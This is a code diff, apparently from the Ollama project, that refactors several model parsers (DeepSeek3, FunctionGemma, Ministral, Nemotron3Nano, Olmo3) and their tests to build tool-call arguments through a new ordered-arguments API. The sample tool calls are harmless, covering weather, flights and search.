||||
|
|
@ -577,9 +577,9 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
|
|||
expected: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"arg": "value",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -606,7 +606,7 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
|
|||
t.Fatalf("Unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if diff := cmp.Diff(tt.expected, result); diff != "" {
|
||||
if diff := cmp.Diff(tt.expected, result, argsComparer); diff != "" {
|
||||
t.Errorf("parseToolCallContent() mismatch (-want +got):\n%s", diff)
|
||||
}
|
||||
})
|
||||
|
|
|
|||
|
|
@ -166,7 +166,7 @@ func (p *FunctionGemmaParser) parseToolCall(content string) (api.ToolCall, error
|
|||
|
||||
// parseArguments parses the key:value,key:value format
|
||||
func (p *FunctionGemmaParser) parseArguments(argsStr string) api.ToolCallFunctionArguments {
|
||||
args := make(api.ToolCallFunctionArguments)
|
||||
args := api.NewToolCallFunctionArguments()
|
||||
if argsStr == "" {
|
||||
return args
|
||||
}
|
||||
|
|
@ -185,7 +185,7 @@ func (p *FunctionGemmaParser) parseArguments(argsStr string) api.ToolCallFunctio
|
|||
value := part[colonIdx+1:]
|
||||
|
||||
// Parse the value
|
||||
args[key] = p.parseValue(value)
|
||||
args.Set(key, p.parseValue(value))
|
||||
}
|
||||
|
||||
return args
|
||||
|
|
|
|||
|
|
@ -3,6 +3,7 @@ package parsers
|
|||
import (
|
||||
"testing"
|
||||
|
||||
"github.com/google/go-cmp/cmp"
|
||||
"github.com/ollama/ollama/api"
|
||||
"github.com/stretchr/testify/assert"
|
||||
)
|
||||
|
|
@ -36,9 +37,9 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
Name: "get_weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"city": {Type: api.PropertyType{"string"}},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -47,7 +48,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -66,7 +67,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -84,7 +85,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "add",
|
||||
Arguments: api.ToolCallFunctionArguments{"a": int64(1), "b": int64(2)},
|
||||
Arguments: testArgs(map[string]any{"a": int64(1), "b": int64(2)}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -102,7 +103,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "set_flag",
|
||||
Arguments: api.ToolCallFunctionArguments{"enabled": true, "verbose": false},
|
||||
Arguments: testArgs(map[string]any{"enabled": true, "verbose": false}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -124,13 +125,13 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{"city": "London"},
|
||||
Arguments: testArgs(map[string]any{"city": "London"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -152,7 +153,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "process",
|
||||
Arguments: api.ToolCallFunctionArguments{"items": []any{"a", "b", "c"}},
|
||||
Arguments: testArgs(map[string]any{"items": []any{"a", "b", "c"}}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -173,9 +174,9 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "update",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"data": map[string]any{"name": "test", "value": int64(42)},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -198,7 +199,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_time",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -224,7 +225,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "set_temp",
|
||||
Arguments: api.ToolCallFunctionArguments{"value": 3.14},
|
||||
Arguments: testArgs(map[string]any{"value": 3.14}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -242,7 +243,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "test",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -261,7 +262,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "greet",
|
||||
Arguments: api.ToolCallFunctionArguments{"name": "日本語"},
|
||||
Arguments: testArgs(map[string]any{"name": "日本語"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -281,11 +282,11 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "search",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"query": "test",
|
||||
"limit": int64(10),
|
||||
"offset": int64(0),
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -308,14 +309,14 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "create",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"config": map[string]any{
|
||||
"settings": map[string]any{
|
||||
"enabled": true,
|
||||
"name": "test",
|
||||
},
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -345,13 +346,13 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_time",
|
||||
Arguments: api.ToolCallFunctionArguments{"timezone": "UTC"},
|
||||
Arguments: testArgs(map[string]any{"timezone": "UTC"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -372,13 +373,13 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "first",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "second",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -411,7 +412,9 @@ func TestFunctionGemmaParser(t *testing.T) {
|
|||
}
|
||||
|
||||
assert.Equal(t, tt.expectedText, allContent)
|
||||
assert.Equal(t, tt.expectedCalls, allCalls)
|
||||
if diff := cmp.Diff(tt.expectedCalls, allCalls, argsComparer); diff != "" {
|
||||
t.Errorf("calls mismatch (-want +got):\n%s", diff)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
|
|
|||
|
|
@ -112,8 +112,8 @@ func (p *MinistralParser) Add(s string, done bool) (content string, thinking str
|
|||
before, _ := splitAtTag(&p.buffer, "}", false)
|
||||
before += "}"
|
||||
|
||||
var data map[string]any
|
||||
if err := json.Unmarshal([]byte(before), &data); err != nil {
|
||||
var args api.ToolCallFunctionArguments
|
||||
if err := json.Unmarshal([]byte(before), &args); err != nil {
|
||||
// todo - throw a better error
|
||||
return "", "", calls, err
|
||||
}
|
||||
|
|
@ -123,7 +123,7 @@ func (p *MinistralParser) Add(s string, done bool) (content string, thinking str
|
|||
call := api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: p.currentTool.Function.Name,
|
||||
Arguments: api.ToolCallFunctionArguments(data),
|
||||
Arguments: args,
|
||||
},
|
||||
}
|
||||
calls = append(calls, call)
|
||||
|
|
|
|||
|
|
@ -225,7 +225,7 @@ func (p *Nemotron3NanoParser) parseToolCall(content string) (api.ToolCall, error
|
|||
toolCall.Function.Name = fnMatch[1]
|
||||
|
||||
// Extract parameters
|
||||
toolCall.Function.Arguments = make(api.ToolCallFunctionArguments)
|
||||
toolCall.Function.Arguments = api.NewToolCallFunctionArguments()
|
||||
paramMatches := nemotronParameterRegex.FindAllStringSubmatch(content, -1)
|
||||
for _, match := range paramMatches {
|
||||
if len(match) >= 3 {
|
||||
|
|
@ -233,7 +233,7 @@ func (p *Nemotron3NanoParser) parseToolCall(content string) (api.ToolCall, error
|
|||
paramValue := strings.TrimSpace(match[2])
|
||||
|
||||
// Try to parse as typed value based on tool definition
|
||||
toolCall.Function.Arguments[paramName] = p.parseParamValue(paramName, paramValue)
|
||||
toolCall.Function.Arguments.Set(paramName, p.parseParamValue(paramName, paramValue))
|
||||
}
|
||||
}
|
||||
|
||||
|
|
@ -244,9 +244,11 @@ func (p *Nemotron3NanoParser) parseParamValue(paramName string, raw string) any
|
|||
// Find the matching tool to get parameter type
|
||||
var paramType api.PropertyType
|
||||
for _, tool := range p.tools {
|
||||
if prop, ok := tool.Function.Parameters.Properties[paramName]; ok {
|
||||
paramType = prop.Type
|
||||
break
|
||||
if tool.Function.Parameters.Properties != nil {
|
||||
if prop, ok := tool.Function.Parameters.Properties.Get(paramName); ok {
|
||||
paramType = prop.Type
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
|
|
|||
|
|
@ -51,7 +51,7 @@ func TestNemotron3NanoParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -65,7 +65,7 @@ func TestNemotron3NanoParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"city": "NYC"},
|
||||
Arguments: testArgs(map[string]any{"city": "NYC"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -78,10 +78,10 @@ func TestNemotron3NanoParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "book_flight",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"from": "SFO",
|
||||
"to": "NYC",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -95,13 +95,13 @@ func TestNemotron3NanoParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"city": "San Francisco"},
|
||||
Arguments: testArgs(map[string]any{"city": "San Francisco"}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"city": "New York"},
|
||||
Arguments: testArgs(map[string]any{"city": "New York"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -115,7 +115,7 @@ func TestNemotron3NanoParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -130,7 +130,7 @@ func TestNemotron3NanoParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "search",
|
||||
Arguments: map[string]any{"query": "test"},
|
||||
Arguments: testArgs(map[string]any{"query": "test"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -143,7 +143,7 @@ func TestNemotron3NanoParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "create_note",
|
||||
Arguments: map[string]any{"content": "Line 1\nLine 2\nLine 3"},
|
||||
Arguments: testArgs(map[string]any{"content": "Line 1\nLine 2\nLine 3"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -165,7 +165,7 @@ func TestNemotron3NanoParser(t *testing.T) {
|
|||
name: "tool call with no function name - returns empty tool call",
|
||||
input: "<tool_call>\n<function=>\n</function>\n</tool_call>",
|
||||
thinkValue: nil,
|
||||
expectedCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "", Arguments: nil}}},
|
||||
expectedCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "", Arguments: api.NewToolCallFunctionArguments()}}},
|
||||
},
|
||||
{
|
||||
name: "content with newlines preserved",
|
||||
|
|
@ -194,7 +194,7 @@ func TestNemotron3NanoParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "set_temp",
|
||||
Arguments: map[string]any{"value": "42"},
|
||||
Arguments: testArgs(map[string]any{"value": "42"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -226,7 +226,7 @@ func TestNemotron3NanoParser(t *testing.T) {
|
|||
if diff := cmp.Diff(thinking, tt.expectedThinking); diff != "" {
|
||||
t.Errorf("thinking mismatch (-got +want):\n%s", diff)
|
||||
}
|
||||
if diff := cmp.Diff(calls, tt.expectedCalls); diff != "" {
|
||||
if diff := cmp.Diff(calls, tt.expectedCalls, argsComparer); diff != "" {
|
||||
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
||||
}
|
||||
})
|
||||
|
|
@ -276,7 +276,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -290,7 +290,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"city": "NYC"},
|
||||
Arguments: testArgs(map[string]any{"city": "NYC"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -302,7 +302,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "test",
|
||||
Arguments: map[string]any{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -329,10 +329,10 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "book_flight",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"from": "SFO",
|
||||
"to": "NYC",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -347,7 +347,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "search",
|
||||
Arguments: map[string]any{"query": "test query"},
|
||||
Arguments: testArgs(map[string]any{"query": "test query"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -367,13 +367,13 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"city": "San Francisco"},
|
||||
Arguments: testArgs(map[string]any{"city": "San Francisco"}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"city": "New York"},
|
||||
Arguments: testArgs(map[string]any{"city": "New York"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -386,7 +386,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "create_note",
|
||||
Arguments: map[string]any{"content": "Line 1\nLine 2\nLine 3"},
|
||||
Arguments: testArgs(map[string]any{"content": "Line 1\nLine 2\nLine 3"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -413,7 +413,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "test",
|
||||
Arguments: map[string]any{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -426,7 +426,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "test",
|
||||
Arguments: map[string]any{"name": ""},
|
||||
Arguments: testArgs(map[string]any{"name": ""}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -473,7 +473,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
|||
if diff := cmp.Diff(allThinking, tt.expectedThinking); diff != "" {
|
||||
t.Errorf("thinking mismatch (-got +want):\n%s", diff)
|
||||
}
|
||||
if diff := cmp.Diff(allCalls, tt.expectedCalls); diff != "" {
|
||||
if diff := cmp.Diff(allCalls, tt.expectedCalls, argsComparer); diff != "" {
|
||||
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
||||
}
|
||||
})
|
||||
|
|
@ -537,9 +537,9 @@ func TestNemotron3NanoParser_WithTools(t *testing.T) {
|
|||
Name: "get_weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"city": {Type: api.PropertyType{"string"}},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -548,7 +548,7 @@ func TestNemotron3NanoParser_WithTools(t *testing.T) {
|
|||
p := &Nemotron3NanoParser{}
|
||||
returnedTools := p.Init(tools, nil, nil)
|
||||
|
||||
if diff := cmp.Diff(returnedTools, tools); diff != "" {
|
||||
if diff := cmp.Diff(returnedTools, tools, toolsComparer); diff != "" {
|
||||
t.Errorf("tools mismatch (-got +want):\n%s", diff)
|
||||
}
|
||||
|
||||
|
|
@ -563,12 +563,12 @@ func TestNemotron3NanoParser_WithTools(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
if diff := cmp.Diff(calls, expectedCalls); diff != "" {
|
||||
if diff := cmp.Diff(calls, expectedCalls, argsComparer); diff != "" {
|
||||
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
||||
}
|
||||
}
|
||||
|
|
|
|||
|
|
@ -242,8 +242,8 @@ func parseOlmo3SingleFunctionCall(s string) (api.ToolCall, error) {
|
|||
|
||||
// parseOlmo3Arguments parses comma-separated key=value pairs
|
||||
// Handles nested parentheses, brackets, braces, and quoted strings
|
||||
func parseOlmo3Arguments(s string) (map[string]any, error) {
|
||||
args := make(map[string]any)
|
||||
func parseOlmo3Arguments(s string) (api.ToolCallFunctionArguments, error) {
|
||||
args := api.NewToolCallFunctionArguments()
|
||||
s = strings.TrimSpace(s)
|
||||
if s == "" {
|
||||
return args, nil
|
||||
|
|
@ -261,7 +261,7 @@ func parseOlmo3Arguments(s string) (map[string]any, error) {
|
|||
// Find the first = sign
|
||||
eqIdx := strings.Index(part, "=")
|
||||
if eqIdx == -1 {
|
||||
return nil, fmt.Errorf("invalid argument format: %s", part)
|
||||
return api.ToolCallFunctionArguments{}, fmt.Errorf("invalid argument format: %s", part)
|
||||
}
|
||||
|
||||
key := strings.TrimSpace(part[:eqIdx])
|
||||
|
|
@ -269,10 +269,10 @@ func parseOlmo3Arguments(s string) (map[string]any, error) {
|
|||
|
||||
value, err := parseOlmo3Value(valueStr)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to parse value for %s: %w", key, err)
|
||||
return api.ToolCallFunctionArguments{}, fmt.Errorf("failed to parse value for %s: %w", key, err)
|
||||
}
|
||||
|
||||
args[key] = value
|
||||
args.Set(key, value)
|
||||
}
|
||||
|
||||
return args, nil
|
||||
|
|
|
|||
|
|
@ -28,7 +28,7 @@ func TestOlmo3Parser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"location": "San Francisco"},
|
||||
Arguments: testArgs(map[string]any{"location": "San Francisco"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -41,7 +41,7 @@ func TestOlmo3Parser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"location": "NYC"},
|
||||
Arguments: testArgs(map[string]any{"location": "NYC"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -53,11 +53,11 @@ func TestOlmo3Parser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "book_flight",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"from": "SFO",
|
||||
"to": "NYC",
|
||||
"date": "2024-01-15",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -70,13 +70,13 @@ get_weather(location="New York")</function_calls>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"location": "San Francisco"},
|
||||
Arguments: testArgs(map[string]any{"location": "San Francisco"}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"location": "New York"},
|
||||
Arguments: testArgs(map[string]any{"location": "New York"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -88,7 +88,7 @@ get_weather(location="New York")</function_calls>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "set_temperature",
|
||||
Arguments: map[string]any{"value": int64(72)},
|
||||
Arguments: testArgs(map[string]any{"value": int64(72)}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -100,7 +100,7 @@ get_weather(location="New York")</function_calls>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "set_price",
|
||||
Arguments: map[string]any{"amount": 19.99},
|
||||
Arguments: testArgs(map[string]any{"amount": 19.99}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -112,7 +112,7 @@ get_weather(location="New York")</function_calls>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "toggle_setting",
|
||||
Arguments: map[string]any{"enabled": true},
|
||||
Arguments: testArgs(map[string]any{"enabled": true}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -124,7 +124,7 @@ get_weather(location="New York")</function_calls>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "clear_value",
|
||||
Arguments: map[string]any{"field": nil},
|
||||
Arguments: testArgs(map[string]any{"field": nil}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -136,7 +136,7 @@ get_weather(location="New York")</function_calls>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "process_items",
|
||||
Arguments: map[string]any{"items": []any{"apple", "banana", "cherry"}},
|
||||
Arguments: testArgs(map[string]any{"items": []any{"apple", "banana", "cherry"}}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -148,12 +148,12 @@ get_weather(location="New York")</function_calls>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "update_config",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"settings": map[string]any{
|
||||
"theme": "dark",
|
||||
"fontSize": int64(14),
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -165,7 +165,7 @@ get_weather(location="New York")</function_calls>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "create_request",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"data": map[string]any{
|
||||
"user": map[string]any{
|
||||
"name": "John",
|
||||
|
|
@ -173,7 +173,7 @@ get_weather(location="New York")</function_calls>`,
|
|||
},
|
||||
"active": true,
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -185,7 +185,7 @@ get_weather(location="New York")</function_calls>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_current_time",
|
||||
Arguments: map[string]any{},
|
||||
Arguments: testArgs(map[string]any{}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -197,7 +197,7 @@ get_weather(location="New York")</function_calls>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "search",
|
||||
Arguments: map[string]any{"query": "hello world"},
|
||||
Arguments: testArgs(map[string]any{"query": "hello world"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -209,7 +209,7 @@ get_weather(location="New York")</function_calls>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "search",
|
||||
Arguments: map[string]any{"query": `say "hello"`},
|
||||
Arguments: testArgs(map[string]any{"query": `say "hello"`}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -221,11 +221,11 @@ get_weather(location="New York")</function_calls>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "create_user",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"name": "John",
|
||||
"age": int64(30),
|
||||
"active": true,
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -257,7 +257,7 @@ get_weather(location="New York")</function_calls>`,
|
|||
if diff := cmp.Diff(thinking, tt.expectedThinking); diff != "" {
|
||||
t.Errorf("thinking mismatch (-got +want):\n%s", diff)
|
||||
}
|
||||
if diff := cmp.Diff(calls, tt.expectedCalls); diff != "" {
|
||||
if diff := cmp.Diff(calls, tt.expectedCalls, argsComparer); diff != "" {
|
||||
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
||||
}
|
||||
})
|
||||
|
|
@ -283,7 +283,7 @@ func TestOlmo3Parser_Streaming(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"location": "SF"},
|
||||
Arguments: testArgs(map[string]any{"location": "SF"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -296,7 +296,7 @@ func TestOlmo3Parser_Streaming(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"location": "NYC"},
|
||||
Arguments: testArgs(map[string]any{"location": "NYC"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -308,7 +308,7 @@ func TestOlmo3Parser_Streaming(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "test",
|
||||
Arguments: map[string]any{},
|
||||
Arguments: testArgs(map[string]any{}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -343,7 +343,7 @@ func TestOlmo3Parser_Streaming(t *testing.T) {
|
|||
if diff := cmp.Diff(allContent, tt.expectedContent); diff != "" {
|
||||
t.Errorf("content mismatch (-got +want):\n%s", diff)
|
||||
}
|
||||
if diff := cmp.Diff(allCalls, tt.expectedCalls); diff != "" {
|
||||
if diff := cmp.Diff(allCalls, tt.expectedCalls, argsComparer); diff != "" {
|
||||
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
||||
}
|
||||
})
|
||||
|
|
